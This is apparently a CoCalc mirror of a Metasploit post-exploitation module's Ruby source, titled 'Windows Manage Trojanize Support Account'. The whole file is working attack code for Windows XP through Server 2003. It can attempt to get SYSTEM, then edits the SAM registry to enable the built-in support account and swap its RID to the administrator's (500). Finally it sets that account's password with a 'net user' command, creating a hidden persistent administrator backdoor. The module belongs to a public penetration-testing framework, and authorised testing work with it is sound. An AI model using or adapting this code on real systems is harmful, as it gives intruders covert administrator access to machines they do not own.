Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/enable_support_account.rb
19592 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::Windows::Registry

8
  include Msf::Post::Windows::Priv

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'Windows Manage Trojanize Support Account',

15
        'Description' => %q{

16
          This module enables alternative access to servers and workstations

17
          by modifying the support account's properties. It will enable

18
          the account for remote access as the administrator user while

19
          taking advantage of some weird behavior in lusrmgr.msc. It will

20
          check if sufficient privileges are available for registry operations,

21
          otherwise it exits.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => 'salcho <salchoman[at]gmail.com>',

25
        'Platform' => [ 'win' ],

26
        'SessionTypes' => [ 'meterpreter' ],

27
        'References'	=> [ 'http://xangosec.blogspot.com/2013/06/trojanizing-windows.html' ],

28
        'Compat' => {

29
          'Meterpreter' => {

30
            'Commands' => %w[

31
              priv_elevate_getsystem

32
            ]

33
          }

34
        },

35
        'Notes' => {

36
          'Stability' => [CRASH_SAFE],

37
          'SideEffects' => [CONFIG_CHANGES],

38
          'Reliability' => []

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        OptString.new('PASSWORD', [true, 'Password of the support user account', 'password']),

46
        OptBool.new('GETSYSTEM', [true, 'Attempt to get SYSTEM privilege on the target host.', false])

47
      ]

48
    )

49
  end

50


51
  def run

52
    reg_key = 'HKLM\\SAM\\SAM\\Domains\\Account\\Users'

53


54
    unless is_system?

55
      if datastore['GETSYSTEM']

56
        print_status('Trying to get system...')

57
        res = session.priv.getsystem

58
        if res[0]

59
          print_good('Got system!')

60
        else

61
          print_error('Unable to get system! You need to run this script.')

62
          return

63
        end

64
      else

65
        print_error('You need to run this script as system!')

66
        return

67
      end

68
    end

69


70
    version = get_version_info

71
    unless version.build_number.between?(Msf::WindowsVersion::XP_SP0, Msf::WindowsVersion::Server2003_SP2)

72
      print_error("#{version.product_name} is not supported")

73
      return

74
    end

75


76
    print_status("Target OS is #{version.product_name}")

77
    names_key = registry_enumkeys(reg_key + '\\Names')

78
    unless names_key

79
      print_error("Couldn't access registry keys")

80
      return

81
    end

82


83
    rid = -1

84
    print_status('Harvesting users...')

85
    names_key.each do |name|

86
      next unless name.include?('SUPPORT_388945a0')

87


88
      print_good("Found #{name} account!")

89
      skey = registry_getvalinfo(reg_key + "\\Names\\#{name}", '')

90


91
      if !skey

92
        print_error("Couldn't open user's key")

93
        break

94
      end

95


96
      rid = skey['Type']

97
      print_status("Target RID is #{rid}")

98
    end

99


100
    if rid == -1

101
      print_error("Couldn't get user's RID...")

102
      return

103
    end

104


105
    users_key = registry_enumkeys(reg_key)

106
    users_key.each do |r|

107
      next if r.to_i(16) != rid

108


109
      f = registry_getvaldata(reg_key + "\\#{r}", 'F')

110
      if check_active(f)

111
        print_status('Account is disabled, activating...')

112
        f[0x38] = ['10'].pack('H')

113
      else

114
        print_error('Target account is already enabled')

115
      end

116


117
      print_status('Swapping RIDs...!')

118
      # Overwrite RID to 500 (as administrator)

119
      f = swap_rid(f, 500)

120


121
      open_key = registry_setvaldata(reg_key + "\\#{r}", 'F', f, 'REG_BINARY')

122
      unless open_key

123
        print_error("Can't write to registry... Something's wrong!")

124
        break

125
      end

126


127
      print_status("Setting password to #{datastore['PASSWORD']}")

128
      cmd = cmd_exec('cmd.exe', "/c net user support_388945a0 #{datastore['PASSWORD']}")

129
      vprint_status(cmd.to_s)

130
    end

131
  end

132


133
  def check_active(f_value)

134
    if f_value[0x38].unpack('H*')[0].to_i == 11

135
      return true

136
    else

137
      return false

138
    end

139
  end

140


141
  def swap_rid(f_value, rid)

142
    # This function will set hex format to a given RID integer

143
    hex = [('%04x' % rid).scan(/.{2}/).reverse.join].pack('H*')

144
    # Overwrite new RID at offset 0x30

145
    f_value[0x30, 2] = hex

146
    return f_value

147
  end

148
end

149


150